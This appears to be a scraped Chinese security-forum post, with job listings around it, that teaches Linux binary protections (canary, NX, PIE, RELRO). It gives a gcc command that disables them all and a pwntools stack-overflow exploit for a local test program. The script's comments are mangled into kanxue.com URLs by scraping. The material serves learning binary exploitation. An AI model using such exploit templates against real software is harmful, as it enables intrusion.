12分钟前
推荐职位
安全分析工程师
3-5年/本科
12-20k
神州网云(北京)信息技术有限公司
未融资/北京
移动逆向分析工程师-阿尔法实验室
经验不限/学历不限
20-30k
北京天融信网络安全技术有限公司
上市公司/北京
Linux安全研究员-阿尔法实验室
经验不限/学历不限
20-30k
北京天融信网络安全技术有限公司
上市公司/北京
实时热点
推荐专栏
论坛最新回帖
52分钟前
1小时前
2小时前
知识点:
- ①CANNARY(栈保护) {用来保护栈溢出,Cannary found表示开了保护}
- ②FORTIFY {比较冷门,防止缓冲区溢出}
- ③NX(DEP) {不让执行ShellCode操作}
- ④PIE(ASLR) {Win上称为DEP 地址空间分布随机化}
- ⑤RELRO {设置符号重定向表格为只读,绑定所有动态符号,防止GOT攻击}
Linux下检查保护机制的命令:
checksec test
[*] '/home/lee/test'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
关闭所有保护编译指令:
gcc -no-pie -fno-stack-protector -z execstack -m32 -o test test.c
Exp:
from pwn import *
https://www.kanxue.com/--------------------------------------
https://www.kanxue.com/init
testProcessHandle = process("./test")
https://www.kanxue.com/calc ebp offset
epbOffset = 0x28 + 0x4
https://www.kanxue.com/exp func addresss
expAddress = 0x08048456
https://www.kanxue.com/payload
payload = 'A' * epbOffset + p32(expAddress)
https://www.kanxue.com/--------------------------------------
https://www.kanxue.com/ EntryPoint Exp Coding By Lee.
def main():
testProcessHandle.sendline(payload)
testProcessHandle.interactive()
https://www.kanxue.com/ let's go
if __name__ == "__main__":
main()